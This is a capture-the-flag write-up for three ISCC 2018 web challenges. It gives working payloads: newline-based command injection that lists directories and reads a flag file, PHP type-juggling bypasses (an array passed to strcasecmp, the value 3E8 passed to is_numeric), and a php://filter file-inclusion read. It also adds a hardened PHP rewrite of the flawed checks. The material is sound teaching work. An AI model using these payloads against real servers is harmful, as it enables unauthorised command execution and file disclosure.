ISCC 2018
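1. Please ping my IP. Can you get the ping through?
I have filtered everything, let's see how you get around it. Challenge URL: http://118.190.152.202:8018
Approach: command injection
Testing shows that ?ip=xxx does indeed run a ping.
%0a (a URL-encoded newline) cuts off the ping command, so whatever follows runs as a separate command.
Linux commands:
Use ls / to list the root directory: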
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20/
This shows the following directories.
Use ls -lR /home to look inside each folder:
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20-lR%20/home
Use cat%20/home/flag to read the file:
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Acat%20/home/flag
2. Please give me username and password!
Challenge URL: http://118.190.152.202:8017/
Constructed URL: http://118.190.152.202:8017/index.php?username=11&password=111
View the source code:
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
    if (0 == strcasecmp($flag,$_GET['username'])){
        $a = fla;
        echo "very good!Username is right";
    }
    else{
        print 'Username is not right<!--index.php.txt-->';
    }
}else
    print 'Please give me username or password!';
if (isset($_GET['password'])){
    if (is_numeric($_GET['password'])){
        if (strlen($_GET['password']) < 4){
            if ($_GET['password'] > 999){
                $b = g;
                print '<p>very good!Password is right</p>';
            }else
                print '<p>Password too little</p>';
        }else
            print '<p>Password too long</p>';
    }else
        print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
    print $flag;
?>
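1. strcasecmp returns NULL when it is given an array, and NULL == 0, so the condition holds.
2. Although password can only go up to 999, and 100 already gives an error, the hexadecimal value 3E8 can be used to get around it.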
http://118.190.152.202:8017/index.php?username[]=1&password=3E8
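The two checks from the source above rewritten with strict type and format validation, as an added example that is not part of the original writeup or the challenge's code. The function names, the $expected placeholder and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not the challenge's code. Function names, $expected and the
// sample inputs are constructed for illustration.

function username_ok($input, string $expected): bool
{
    // username[]=1 arrives as an array: reject non-strings before comparing,
    // so a NULL result can never be read as "equal".
    if (!is_string($input)) {
        return false;
    }
    // Case-insensitive like the original, with a strict boolean result.
    return hash_equals(strtolower($expected), strtolower($input));
}

function password_ok($input): bool
{
    // ctype_digit() accepts decimal digits only, so "3E8" is rejected here
    // although is_numeric() accepts it (PHP reads it as exponent notation).
    if (!is_string($input) || !ctype_digit($input)) {
        return false;
    }
    // Same limits as the original. With digits only they cannot both hold.
    return strlen($input) < 4 && (int) $input > 999;
}

// The original password test, kept for comparison.
function password_loose($input): bool
{
    return is_numeric($input) && strlen($input) < 4 && $input > 999;
}

$expected = 'placeholder-secret'; // stands in for the real $flag
$cases = [
    'username[]=1'     => ['username' => ['1'], 'password' => '12'],
    'password=3E8'     => ['username' => 'x', 'password' => '3E8'],
    'password=999'     => ['username' => 'x', 'password' => '999'],
    'correct username' => ['username' => 'PLACEHOLDER-SECRET', 'password' => '12'],
];

foreach ($cases as $label => $get) {
    printf(
        "%-17s username_ok=%-5s password_ok=%-5s password_loose=%s\n",
        $label,
        var_export(username_ok($get['username'], $expected), true),
        var_export(password_ok($get['password']), true),
        var_export(password_loose($get['password']), true)
    );
}
```

Run it with the php command-line binary; PHP 7 or later is assumed for the type declarations.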
3. Can you bypass it?
Challenge URL: http://118.190.152.202:8008/
File inclusion vulnerability:
http://118.190.152.202:8008/index.php?f=Php://filter/read=convert.base64-encode/resource=index&id=4
Base64-decode the output.